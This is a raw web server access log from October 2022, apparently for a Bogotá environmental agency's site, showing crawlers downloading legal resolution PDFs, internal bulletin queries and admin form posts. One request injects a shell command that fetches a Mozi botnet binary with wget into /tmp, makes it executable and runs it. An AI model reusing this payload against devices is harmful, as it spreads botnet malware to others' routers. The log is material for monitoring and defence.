191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
191.95.55.129 - - [17/Oct/2022:14:36:56 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
216.245.221.92 - - [17/Oct/2022:14:37:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Oct/2022:14:38:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.132.76 - - [17/Oct/2022:14:38:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4924.pdf HTTP/1.1" 200 352145
157.55.39.202 - - [17/Oct/2022:14:38:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/1272.pdf HTTP/1.1" 200 1618993
172.22.2.4 - - [17/Oct/2022:14:37:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.42 - - [17/Oct/2022:14:39:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2799.pdf HTTP/1.1" 200 688833
172.22.2.4 - - [17/Oct/2022:14:38:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.40 - - [17/Oct/2022:14:40:28 -0500] "GET /BLA/resoluciones/AUTOS%202016/1745.pdf HTTP/1.1" 200 522983
114.119.141.42 - - [17/Oct/2022:14:41:12 -0500] "GET /BLA/resoluciones/AUTOS%202015/6417.pdf HTTP/1.1" 200 740812
201.245.192.253 - - [17/Oct/2022:14:41:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42942
201.245.192.253 - - [17/Oct/2022:14:41:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43750
216.245.221.92 - - [17/Oct/2022:14:42:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:14:42:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve=cargos HTTP/1.1" 200 1085
186.29.148.110 - - [17/Oct/2022:14:42:36 -0500] "GET /BLA/resoluciones/AUTOS%202022/0113.pdf HTTP/1.1" 200 381771
114.119.141.51 - - [17/Oct/2022:14:42:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2150.pdf HTTP/1.1" 200 514781
201.245.192.253 - - [17/Oct/2022:14:43:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [17/Oct/2022:14:43:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2021&resuelve=cargos HTTP/1.1" 200 626
172.22.2.4 - - [17/Oct/2022:14:43:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2020&resuelve=cargos HTTP/1.1" 200 1058
172.22.2.4 - - [17/Oct/2022:14:43:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2019&resuelve=cargos HTTP/1.1" 200 626
66.249.73.97 - - [17/Oct/2022:14:44:13 -0500] "-" 408 -
114.119.141.52 - - [17/Oct/2022:14:44:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4152.pdf HTTP/1.1" 200 668272
172.22.2.4 - - [17/Oct/2022:14:43:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.52 - - [17/Oct/2022:14:45:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3210.pdf HTTP/1.1" 200 546772
172.22.2.4 - - [17/Oct/2022:14:44:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
216.245.221.92 - - [17/Oct/2022:14:47:09 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.42 - - [17/Oct/2022:14:47:32 -0500] "GET /BLA/resoluciones/AUTOS%202014/6918.pdf HTTP/1.1" 200 2166054
173.252.107.23 - - [17/Oct/2022:14:47:49 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
201.245.192.253 - - [17/Oct/2022:14:47:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.51 - - [17/Oct/2022:14:49:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4749.pdf HTTP/1.1" 200 335680
190.24.59.156 - - [17/Oct/2022:14:49:29 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
190.24.59.156 - - [17/Oct/2022:14:49:31 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
207.46.13.190 - - [17/Oct/2022:14:49:41 -0500] "GET /BLA/resoluciones/00001066.tif HTTP/1.1" 404 1018
172.22.2.4 - - [17/Oct/2022:14:50:45 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2004%20del%2023%20de%20Diciembre%20de%202016.pdf HTTP/1.1" 304 -
114.119.141.71 - - [17/Oct/2022:14:50:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4027.pdf HTTP/1.1" 200 83555
172.22.2.4 - - [17/Oct/2022:14:49:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.24.59.156 - - [17/Oct/2022:14:51:16 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
207.46.13.177 - - [17/Oct/2022:14:51:16 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
66.249.73.127 - - [17/Oct/2022:14:51:43 -0500] "-" 408 -
172.22.2.4 - - [17/Oct/2022:14:50:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [17/Oct/2022:14:52:09 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.42 - - [17/Oct/2022:14:52:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6083.pdf HTTP/1.1" 200 3554204
201.245.192.253 - - [17/Oct/2022:14:52:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.71 - - [17/Oct/2022:14:54:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5893.pdf HTTP/1.1" 200 275686
190.24.59.156 - - [17/Oct/2022:14:54:33 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 2102
190.24.59.156 - - [17/Oct/2022:14:54:36 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
190.24.59.156 - - [17/Oct/2022:14:54:37 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
172.22.2.4 - - [17/Oct/2022:14:54:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0490&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
114.119.141.51 - - [17/Oct/2022:14:55:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0113.pdf HTTP/1.1" 200 492542
190.24.59.156 - - [17/Oct/2022:14:55:57 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
172.22.2.4 - - [17/Oct/2022:14:56:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0490&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1592
172.22.2.4 - - [17/Oct/2022:14:56:02 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [17/Oct/2022:14:56:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [17/Oct/2022:14:55:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:14:56:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1865&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1279
216.245.221.92 - - [17/Oct/2022:14:57:09 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.51 - - [17/Oct/2022:14:57:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5259.pdf HTTP/1.1" 200 313178
200.118.61.104 - - [17/Oct/2022:14:57:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
200.118.61.104 - - [17/Oct/2022:14:57:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [17/Oct/2022:14:56:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
201.245.192.253 - - [17/Oct/2022:14:57:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18od3hvT8zPaMZgGAaVP4JLr1wymj3kWIY1HeiKyBe+jqNbFBXVpPlK&y=U2FsdGVkX1+eoKnZMpR9g8YJMveL4Qw1v4Sn51Fue0A= HTTP/1.1" 200 30
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+00/CQFI+JwOQbgWJWCRHbVjXBQlL/4CqmuFza8fm3uuh7RvSiECJ/EBUeREsnjYbinks8XoNI2EOf1AAv1PBGbbEQ3I7ibF4=&u=U2FsdGVkX1/5O22jPtEobsPVEOhAqc4g51WehBwC33U=&y=U2FsdGVkX1+eoKnZMpR9g8YJMveL4Qw1v4Sn51Fue0A= HTTP/1.1" 200 97
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19QmwJHXnR4Jz6oBYfF/aUZLHgXldQfHJE6+s02YYG5Jbixi7PjwKGqP2/pzWigq4bisfh57qFuiA153IxrfJV4u+kCdNsMUsbw9C3aaPKtzyEbcVWK3i+rMjEu+wmsncYZRcr2p/UKvaFk6KVEemsMSETIfY2x2uaSDDOmSudiUteYdl3wYfEYeeA6baw+NsR4VLb+6r+cRom+Yc0+R1UUZzFsQO4hC2SJJ1g5JfYYLYVm2E1r9Ib+2Ze414J7FzQx4gVC8N/UTziq8Oa6XE+kMvXHo9Pws3Ktd3FI7w/uga8l1vacIVtDV0aiWBG58fMhwHrVn13kTrjluz2AnqsIoIgIbAn0uxB7d2QGOHTgu6f60IdKtIRpJSVVt3YM/WL2ylPA5vuuvyxWU7YKw2K5ShR3C8y9+LOETeFv7yk1JX13nM+Cr7w8GX4NWSpld+9EfAf8I0FplZwZ2SvOZ+lT4bZB2E5WknVWduKmwoALx+ZCo3ZmxA32w7FK3GwTX6RD0M8j8tz7pAo+D5ZLbDz5R9zi7V2Dsjhz75G9VRCBpvQtu2Og0DsrVojOJWaidwBSbjfXnJK9AFKLqFKuIYmv/6cOqOFoxCktWV1XDPdY2EPOijfipym8uUNDNMj+lvieEZSa96Wg0/FkTkK0wPrzeNQm+W8fBy8tH0kQ82Z6un68Z+pvTM30J6vg0/wqw6RnCoFNZcY5ZM33TdcpBJoPKZyA11HH6EApw1eJ5vop0U55LRFxhjaKGtXywNYIkuW8jYDht9hlJXeblJwDSBh9B1mY1HJ7S6p903B7aoZC9v/VWLHn+5LvTXnTbzrb+k1dmLNkRjgPkP5dZkzRBMQDdnMbPoGcYrYUHGbrhx8SdOztFoNz4SHzXU7srgdLPODJLdQe/1S/kHf1fHkyi3YHVrGXlFPYTcq1y6sM2+ELCzbvjvyM3DgsuwjJVXYWhTqAMrssl30OB0SxUYhqkVl71Liddvm9h0uWD4itPQQiyJTka1N/p2Cw3Yp6hEQv0DtvfSJ33KnIX1aTG0lIeUn8QDqitsQlxO/iTEetkJa7dEUwLOj7Vl6MVM/jvZAd187Yf3tifjsXTTj7Wc7pPbg7YXlU1vb6E6nwbAB/CgeZzGBRXmvimn+exGVvwWDmNbd3llnSFnGpW0/BHD5rSzJV2Vey3ZOlPkhfvBoWOQRp7/Fo2wYQz4E9kM22d5bPA7ri3g1kBNFiKr4MMMPHfPlaUZjpolctVZcE4iosgn58ASL12PSVnnkQ95HEnBrstEJhwroQA4CGqJSJoPUicBGOjbyU4kSc4JqWcvU9EqMISOE+wU3KLjYj5v7xJNJAyCKiLWTXLtCp1iuaz9O3rmoAR9I93lMlKakNgZ7FrsKwVKcDf3hRytSKdqfnE+RRIwnhqJaRcn3ItOC7xdHxV51D0Ir0J0EEWaU=&u=U2FsdGVkX1/5O22jPtEobsPVEOhAqc4g51WehBwC33U=&y=U2FsdGVkX1+eoKnZMpR9g8YJMveL4Qw1v4Sn51Fue0A= HTTP/1.1" 200 1021
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18u09eKKFKXkK5XRD70L4Ufl8DnHFGGuvlwUCa1mw5FjRvZkMnjELZa62gsQFJQn2Uds5CrXJ0Aotxz6+/Rt0YS+kccvUzVU6FngGXFaGXUXJgFsoc52iDW1Y03462+rz2JTjlBdChH116iezjIE0aVZlslgT1/SWJXmQWVBBu+24psWtn1WVqwzzT1fXQ0FBBt3VGpLYAdQ4bdiv8ct1HDh9Zj3uOE+scVL9f5wvLMDzNsShnkSgz/oPk8pk7OjTMp0Oc8xVDicN3iO951F8MgKFgYnl/MVFZ//p3yFELd1GG5d0wrIUPP8Y9d1zZBGpibrX07N/2HWg==&u=U2FsdGVkX1/5O22jPtEobsPVEOhAqc4g51WehBwC33U=&y=U2FsdGVkX1+eoKnZMpR9g8YJMveL4Qw1v4Sn51Fue0A= HTTP/1.1" 200 327
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/cjson/pre?f=9&x=U2FsdGVkX18od3hvT8zPaMZgGAaVP4JLr1wymj3kWIY1HeiKyBe+jqNbFBXVpPlK HTTP/1.1" 200 25142
186.102.54.64 - - [17/Oct/2022:14:58:29 -0500] "GET /kwssiamovil/sm/cjson/pre?f=18&x=U2FsdGVkX18od3hvT8zPaMZgGAaVP4JLr1wymj3kWIY1HeiKyBe+jqNbFBXVpPlK HTTP/1.1" 200 32849
114.119.132.76 - - [17/Oct/2022:14:58:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4468.pdf HTTP/1.1" 200 533090
66.249.73.127 - - [17/Oct/2022:14:59:13 -0500] "-" 408 -
114.119.132.76 - - [17/Oct/2022:15:00:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3689.pdf HTTP/1.1" 200 456347
138.197.166.74 - - [17/Oct/2022:15:01:06 -0500] "\x16\x03\x01" 400 226
138.197.166.74 - - [17/Oct/2022:15:01:07 -0500] "\x16\x03\x01" 400 226
138.197.166.74 - - [17/Oct/2022:15:01:07 -0500] "\x16\x03\x01" 400 226
216.245.221.92 - - [17/Oct/2022:15:02:09 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [17/Oct/2022:15:02:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2124.pdf HTTP/1.1" 200 766608
172.22.2.4 - - [17/Oct/2022:15:01:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.24.59.156 - - [17/Oct/2022:15:02:43 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
190.24.59.156 - - [17/Oct/2022:15:02:46 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
201.245.192.253 - - [17/Oct/2022:15:02:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
157.55.39.25 - - [17/Oct/2022:15:03:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0182.pdf HTTP/1.1" 200 354531
172.22.2.4 - - [17/Oct/2022:15:01:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
114.119.141.53 - - [17/Oct/2022:15:03:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/RESOLUCION%20204%20%20DE%202000.pdf HTTP/1.1" 200 207089
190.24.59.156 - - [17/Oct/2022:15:04:32 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
190.24.59.156 - - [17/Oct/2022:15:04:34 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
114.119.141.42 - - [17/Oct/2022:15:05:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1492.pdf HTTP/1.1" 200 69033
190.24.59.156 - - [17/Oct/2022:15:06:09 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
190.24.59.156 - - [17/Oct/2022:15:06:12 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
66.249.73.127 - - [17/Oct/2022:15:06:43 -0500] "-" 408 -
172.22.2.4 - - [17/Oct/2022:15:06:49 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0604&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
216.245.221.92 - - [17/Oct/2022:15:07:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Oct/2022:15:07:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
190.24.59.156 - - [17/Oct/2022:15:07:58 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
172.22.2.4 - - [17/Oct/2022:15:08:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0604&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1618
172.22.2.4 - - [17/Oct/2022:15:08:03 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [17/Oct/2022:15:06:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.69 - - [17/Oct/2022:15:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2842.pdf HTTP/1.1" 200 463005
172.22.2.4 - - [17/Oct/2022:15:09:19 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Oct/2022:15:07:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
114.119.141.42 - - [17/Oct/2022:15:10:08 -0500] "GET /autoliquidacion/index.php?dir=TR%C3%83%C2%AF%C3%82%C2%BF%C3%82%C2%BDMITES%2BACEITES-RESIDUOS-ESTACIONES/REGISTRO%2BACEITE%2BVEGETAL%2BUSADO/&sort=size&order=desc HTTP/1.1" 200 7090
200.118.61.104 - - [17/Oct/2022:15:10:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 304 -
207.46.13.84 - - [17/Oct/2022:15:10:52 -0500] "GET /BLA/resoluciones/AUTOS%202022/3136.pdf HTTP/1.1" 200 3183249
172.22.2.4 - - [17/Oct/2022:15:10:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=2022&resuelve=sancion HTTP/1.1" 200 15095
172.22.2.4 - - [17/Oct/2022:15:10:57 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:15:11:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve=inicio%20 HTTP/1.1" 200 756778
172.22.2.4 - - [17/Oct/2022:15:11:15 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:15:11:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=2022&resuelve=exoner HTTP/1.1" 200 626
172.22.2.4 - - [17/Oct/2022:15:11:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=2022&resuelve=impone%20sancion HTTP/1.1" 200 626
114.119.141.52 - - [17/Oct/2022:15:11:48 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/ANEXO%20No.%201-%20NORMAS%20LEGALES%20DE%20ESTRUCTURA%20Y%20PLANTA/Decreto%20673%20de%201995%20Reestructura%20el%20DAMA.htm HTTP/1.1" 200 59971
172.22.2.4 - - [17/Oct/2022:15:11:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=2021&resuelve=impone%20sancion HTTP/1.1" 200 626
172.22.2.4 - - [17/Oct/2022:15:11:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve=impone%20sancion HTTP/1.1" 200 626
172.22.2.4 - - [17/Oct/2022:15:12:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve=impone%20sancion HTTP/1.1" 200 626
172.22.2.4 - - [17/Oct/2022:15:12:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve=sancion HTTP/1.1" 200 102560
216.245.221.92 - - [17/Oct/2022:15:12:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:15:12:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=RESIDUOS&fecha=2022&resuelve=inicio%20 HTTP/1.1" 200 56060
186.29.148.110 - - [17/Oct/2022:15:12:37 -0500] "GET /BLA/resoluciones/AUTOS%202022/5459.pdf HTTP/1.1" 200 369779
200.118.61.104 - - [17/Oct/2022:15:12:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5607.pdf HTTP/1.1" 200 498408
201.245.192.253 - - [17/Oct/2022:15:12:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
157.55.39.202 - - [17/Oct/2022:15:13:18 -0500] "GET / HTTP/1.1" 200 319
114.119.141.52 - - [17/Oct/2022:15:13:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2943.pdf HTTP/1.1" 200 53268
103.173.230.172 - - [17/Oct/2022:15:13:39 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
190.145.240.68 - - [17/Oct/2022:15:13:44 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18N+XAQfOoUlS9rtuJVZujq5aZpI1B6MEHG13UfGnDX291xEVZJxQjn&y=U2FsdGVkX19IHs4D3L2vZ9WaehQ0+eoC9Z7urdSUCZmY0YP3NdA6O4KjW/zY+IhL HTTP/1.1" 200 30
190.145.240.68 - - [17/Oct/2022:15:13:44 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19x8Ak0jNNCxmLKzBW6jBeQc50PIyH4ru3bgQAuHOrKbGaRdnQj7EYTl/vX8PzcWAcvpUxMHvx1ZJ4HVepcfnTcznWvUgeGiV8=&u=U2FsdGVkX19yx+wnVZbAL6zbrMpVVEp1+aqckm988sw=&y=U2FsdGVkX19IHs4D3L2vZ9WaehQ0+eoC9Z7urdSUCZmY0YP3NdA6O4KjW/zY+IhL HTTP/1.1" 200 97
190.145.240.68 - - [17/Oct/2022:15:13:44 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+RVLbvvG9abYylDVn6kJaiTuZBqZeDuW1MVQFENrrcrZO6RKD7rd4I3pztVdVP2d+peDK6xpPq7zUlgcvJB2R0YOmMA2rFw0v5XGX6e7/gGwaSbCQh/EynC48XzSTiE1PD1Sy1d9iR6z2eAXgWDnxvZqptA+46MraB5EMns28qNOMF4Du37JpwhYZm/Nes7QH8zH+vGToJGSo4HQYD0l+rsyQL6FbGfgx328f8HhB8+Tvix6gDHBBci6k0Go8Gckw+jYGuhM83jXvJkajZk95g6X5BaVeu0ViFbBrVYAA6D5RUDfFhlSA4KxVDwdlRasnD3eFiL0aNB25KYpqEJ+1NhxPxM5KmRbzNfRnPOZOdvl/NnnMijU0DbvjAAuwuTIrDZ7j+Ret8N4eX1Fjz9o3gOLi4aO18M1WJ5wir03jOigDS3Orir9xL8KqWbIDrrJKe+WPBdXvgHgyji3dxDjuvyu0+SLnYMxd5Zlcb/7/idbd0CMMn/8KnxBEZdRDXhBY8vjOZBaZX3MjqB3RSfgFBBmqEL246rfYCongNDHV8d5wYt3d5oK2zRtyF/wzA13bZqR14/PM9cjYAixfFnVRQxxpGeZrZLTC9XPH8ffTeYuYJWfr/77N1+/Vp2O3+fp1lg/gSASnsypQiTAm8vwLMNzrCXlmSu0doW+WJQb2OorlJyRxM2GBPuapJWNiooTGzSbwJKSLO5Hu2J4IvBUMNpm5Bqag9rjtEsTsbUlK96HHX9G6rNgHV01GvvR+0unKa0MWq4DdzN9O24VwdgfgUZEMsjeWV1gope1Kj3OF6MUKOupX0aSyBxnv7YP3iY8hieauNAhY3boaZLRIcu5zR5mgBLmvGDPcPo8zVMEKnOXoD+UsFFHHfxYwnXuSxuETPILALTRLzQaKxiR59UY9MOe9UocDyr4ds1OWrTVocFJJjRjB6DX75n+MGCli/3xM6pDKQOXHvgid5NiHjAl7TaGX9HfJjYxHhVbMmDKmipFaYxP2jI9DBf8t7OWUA/5xUP7QhrCW05MXLKL30S999BzNJG85Th1AuUceW276G2H+Ykv+MuC59Yj8D9ZjC8iDXxISUfL1jMh56LU91TAmOEynXap43YaifAtxzZBEMJuJpXakP1h+xBHbO5yEX/qhAFamRCRFg+aXSHPjYgvMjQu2T/0KaWspAI2S6s1UDiQ+MtU9/flD0RtAvrPwzpmvSV9hmf7W+3KQRsurO50u1soarLhc45LJ+izeyzhVlLS17MRQuGX6B+EuKueJW3T3jyAiLnLYVpMB1atFBYLUcN6NZKbmJFsxbv9vPh29/xEzwFCVJcBh1TkOG3+D2mlJcrJiiSrrreW74HR2Gwgp1xkvuLi5IdiJT2bm3PI7eYu1G479w04nU6firHA0Xhz9L/0g5HnEYoTwgATwix7zK1VQ50RX7KG4=&u=U2FsdGVkX19yx+wnVZbAL6zbrMpVVEp1+aqckm988sw=&y=U2FsdGVkX19IHs4D3L2vZ9WaehQ0+eoC9Z7urdSUCZmY0YP3NdA6O4KjW/zY+IhL HTTP/1.1" 200 2649
190.145.240.68 - - [17/Oct/2022:15:13:44 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX181ap+5rogu9BRDw04+cMsVboAvWgNFeXReu+nW6SVZOctf0fT2bgoIrXjpwLzBAUKVmIm/Oi7RWaWHFRbr15qqDHNrihXNMqmfa0yyJwE9pBR/bmN+bmWVBImieHUCnpNhgDWDO+z1jhPLLk+40VZTKpyB+l3hpZGv1aGlt+kMqchc1AbqXBqHSyHH15hMY6Cqg3cyqEqUqee0esGB88hf9iuydPVeemNA5XhEcylDvRL2/xV3H+DkNQ749Fo2Jv0w43W6IDMfa0bO+boMCfiEcS7hoo3HpzWAf9E909f4Q4JLMocaq6Vwkuab8JISlbH1lXD+4Snz1Q==&u=U2FsdGVkX19yx+wnVZbAL6zbrMpVVEp1+aqckm988sw=&y=U2FsdGVkX19IHs4D3L2vZ9WaehQ0+eoC9Z7urdSUCZmY0YP3NdA6O4KjW/zY+IhL HTTP/1.1" 200 196
190.145.240.68 - - [17/Oct/2022:15:13:44 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18N+XAQfOoUlS9rtuJVZujq5aZpI1B6MEHG13UfGnDX291xEVZJxQjn HTTP/1.1" 200 30992
190.24.59.156 - - [17/Oct/2022:15:13:46 -0500] "POST /BLA/boletinlegal/admin/notificaciones/ingresar.php HTTP/1.1" 200 30475
190.24.59.156 - - [17/Oct/2022:15:13:47 -0500] "GET /BLA/boletinlegal/admin/css/creation.css HTTP/1.1" 200 3945
190.24.59.156 - - [17/Oct/2022:15:13:47 -0500] "GET /css/global/buttons.css HTTP/1.1" 404 1324
190.24.59.156 - - [17/Oct/2022:15:13:48 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1346
66.249.73.127 - - [17/Oct/2022:15:14:13 -0500] "-" 408 -
172.22.2.4 - - [17/Oct/2022:15:12:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
